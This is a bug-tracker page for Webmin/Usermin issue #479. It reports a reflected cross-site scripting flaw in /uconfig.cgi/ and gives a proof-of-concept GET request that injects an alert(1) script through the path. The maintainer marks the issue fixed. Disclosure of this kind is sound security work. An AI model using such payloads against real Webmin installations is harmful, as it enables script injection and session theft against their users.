Webmin / Usermin Bugs / #479 XSS (cross-site scripting) vulnerability in /uconfig.cgi/

#479 XSS (cross-site scripting) vulnerability in /uconfig.cgi/

Milestone: 1.780

Status: closed-fixed

Owner: nobody

Labels: None

Priority: 5

Updated: 2019-10-21

Created: 2019-10-21

Creator: xyz

Private: No

It's possible to append the following string to the directory name: /?>'"><script>alert(1)</script> using the GET method.

Simple Proof-of-concept:

GET /uconfig.cgi/?%3E'%22%3E%3Cscript%3Ealert(1)%3C/script%3E?mailbox HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: https://10.0.0.5:20000/
Cookie: usid=4a32b0070ec2edebb90a5d946940fc15; testing=1; redirect=1
Connection: Keep-Alive
Host: 10.0.0.5:20000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US

Set path to '/uconfig.cgi/'
Set query to '>'"><script>alert(1)</script>?mailbox'

It's possible to embed a script in the response, which will be executed when the page loads in the user's browser.

1 Attachments

Screen Shot 2019-10-21 at 11.52.07 AM.png

Discussion

Jamie Cameron - 2019-10-21

status: open --> closed-fixed
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:

Jamie Cameron - 2019-10-21

Thanks, we'll fix this in the next release.

If you would like to refer to this comment somewhere else in this project, copy and paste the following link:

XSS (cross-site scripting) vulnerability in /uconfig.cgi/

A web-based interface for system administration of UNIX

Group

Searches

Help

#479 XSS (cross-site scripting) vulnerability in /uconfig.cgi/

Discussion